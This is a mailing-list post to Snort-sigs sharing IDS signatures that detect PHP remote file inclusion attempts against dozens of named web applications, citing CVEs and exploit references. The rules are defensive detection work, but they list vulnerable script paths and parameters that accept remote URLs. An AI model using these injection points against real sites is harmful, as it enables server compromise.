uricontent:"/dosearch.php?"; nocase; uricontent:"RESPATH="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2530;
reference:url,www.milw0rm.com/exploits/3865; sid:2003678; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
payflow_pro.php abs_path"; flow:established,to_server;
uricontent:"/include/payment/payflow_pro.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003687; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
global.php abs_path"; flow:established,to_server;
uricontent:"/global.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003688; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
libsecure.php abs_path"; flow:established,to_server;
uricontent:"/libsecure.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003689; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB VM Watermark Remote Inclusion Attempt --
watermark.php GALLERY_BASEDIR"; flow:established,to_server;
uricontent:"/watermark.php?"; nocase; uricontent:"GALLERY_BASEDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2575;
reference:url,www.milw0rm.com/exploits/3857; sid:2003692; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
get_header.php"; flow:established,to_server;
uricontent:"/get_header.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.milw0rm.com/exploits/1632; reference:cve,2006-1636;
reference:bugtraq,17358; classtype:web-application-attack;
sid:2002899; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
functions_install.php"; flow:established,to_server;
uricontent:"/functions_install.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:cve,2006-1503; reference:bugtraq,17290;
classtype:web-application-attack; sid:2002902; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Versado CMS Remote Inclusion Attempt --
ajax_listado.php urlModulo"; flow:established,to_server;
uricontent:"/includes/ajax_listado.php?"; nocase;
uricontent:"urlModulo="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2541;
reference:url,www.milw0rm.com/exploits/3847; sid:2003671; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wikivi5 Remote Inclusion Attempt -- show.php
sous_rep"; flow:established,to_server;
uricontent:"/handlers/page/show.php?"; nocase; uricontent:"sous_rep=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2570;
reference:url,www.milw0rm.com/exploits/3863; sid:2003696; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wptable-button.php wpPATH"; flow:established,to_server;
uricontent:"/js/wptable-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2484;
reference:url,www.milw0rm.com/exploits/3824; sid:2003685; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wordtube-button.php wpPATH"; flow:established,to_server;
uricontent:"/wordtube-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2481;
reference:url,www.milw0rm.com/exploits/3825; sid:2003686; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB iPhotoAlbum header.php remote file include";
flow:established,to_server; uricontent:"/header.php?"; nocase;
pcre:"/set_menu=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,23189; classtype:web-application-attack;
sid:2003517; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Yaap Remote Inclusion Attempt -- common.php
root_path"; flow:established,to_server;
uricontent:"/includes/common.php?"; nocase; uricontent:"root_path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2664;
reference:url,www.milw0rm.com/exploits/3908; sid:2003739; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/libs/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003718; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
lom_update.php ETCDIR"; flow:established,to_server;
uricontent:"/lom_update.php?"; nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003719; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
check-lom.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/check-lom.php?"; nocase; uricontent:"ETCDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003720; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
weigh_keywords.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/weigh_keywords.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003721; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- logout.php
ETCDIR"; flow:established,to_server; uricontent:"/logout.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003722; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- help.php
ETCDIR"; flow:established,to_server; uricontent:"/help.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003723; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- index.php
ETCDIR"; flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003724; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- login.php
ETCDIR"; flow:established,to_server; uricontent:"/login.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003725; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/web/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003747; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB MXBB Remote Inclusion Attempt -- faq.php
module_root_path"; flow:established,to_server; uricontent:"/faq.php?";
nocase; uricontent:"module_root_path="; nocase; uricontent:"cmd=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2493;
reference:url,www.milw0rm.com/exploits/3833; sid:2003684; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php abs_path";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003698; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion checkout.php
abs_path"; flow:established,to_server; uricontent:"/checkout.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003699; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion libsecure.php
abs_path"; flow:established,to_server; uricontent:"/libsecure.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003700; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php repinc";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"repinc="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2558;
reference:url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded;
sid:2003701; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Workbench Survival Guide Remote Inclusion
Attempt -- headerfile.php path"; flow:established,to_server;
uricontent:"/header.php?"; nocase; uricontent:"path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2542;
reference:url,www.milw0rm.com/exploits/3848; sid:2003670; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list php)";
flow:established,to_server; uricontent:".php"; nocase;
uricontent:"php"; nocase;
pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*php?/Ui";
reference:url,www.sans.org/top20/; classtype:web-application-attack;
sid:xx; rev:1; )

--
Jamie Riden, CISSP / jamesr@europe.com / jamie@honeynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/


-- 
Jamie Riden, CISSP / jamesr@europe.com / jamie@honeynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/

-------------------------------------------------------------------------
This SF.net email is sponsored by DB2 Express
Download DB2 Express C - the FREE version of DB2 express and take
control of your XML. No limits. Just data. Click to get it now.
http://sourceforge.net/powerbar/db2/
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Snort-sigs] PHP remote include sigs (part II), Jamie Riden <=
Previous by Date:  [Snort-sigs] PHP remote include sigs (part I), Jamie Riden
Next by Date:  [Snort-sigs] Bleeding Edge Threats Daily Signature Changes, bleeding
Previous by Thread:  [Snort-sigs] PHP remote include sigs (part I), Jamie Riden
Next by Thread:  [Snort-sigs] Changes to VRT Certified Rule Update Packages, Matthew Watchinski
Indexes:  [Date] [Thread] [Top] [All Lists]